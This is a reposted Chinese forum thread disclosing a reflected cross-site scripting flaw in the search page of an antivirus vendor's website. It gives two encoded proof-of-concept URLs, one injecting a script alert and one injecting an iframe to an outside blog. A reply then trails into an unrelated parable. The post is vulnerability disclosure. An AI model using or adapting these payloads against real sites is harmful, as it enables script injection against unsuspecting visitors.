1   1  /  1  页   跳转

[转载] ikaka漏洞风险

ikaka漏洞风险

漏洞风险(Exploits/Risk Related)

网站
风险信息
1, site.ikaka.com
[Title:卡卡网站吧]
▁▂▃▄[size=+0]▅▆
未修复
(XSS)

*发现者:
Safelab
测试地址1:
>>>>http://site.ikaka.com/aspx/search.aspx?kw=%3C/script%3E%3Cscript%3Ealert%286%29%3C/script%3E%2Fmarquee%3E%3Ch1%3ESafelab%3C%2Fh1%3E%3C%2Fmarquee%3E 打开后将显示对话框“6”,一行字“Safelab”(底部)(请复制以上蓝色地址到地址栏测试)

测试地址2:
>>>>http://site.ikaka.com/aspx/search.aspx?kw=%3C/script%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fsafelab.spaces.live.com%3E%3C%2Fiframe%3E%2Fmarquee%3E%3Ch1%3ESafelab%3C%2Fh1%3E%3C%2Fmarquee%3E 打开后将显示一个IFrame指向本博客,一行字“Safelab”(底部)(请复制以上蓝色地址到地址栏测试)


Alexa Rank: 10440
Google PageRank:
概述:一个杀软厂商旗下网站,恶意构造的查询关键字可能导致非法用途。
威胁度: 6 (高)

分析: Safelab.spaces.live.com


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
分享到:
gototop
 

回复:ikaka漏洞风险

已反馈
传说在很远的古代,一个庙里,有一个大神与一个小鬼住在里面。天下了大雨,庙前的河里长了水。来了一个人,过不了河,就把庙里的大神搬了出去,丢在河里,然后他踏在大神的身上,飞跳了过河。等会又来了
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT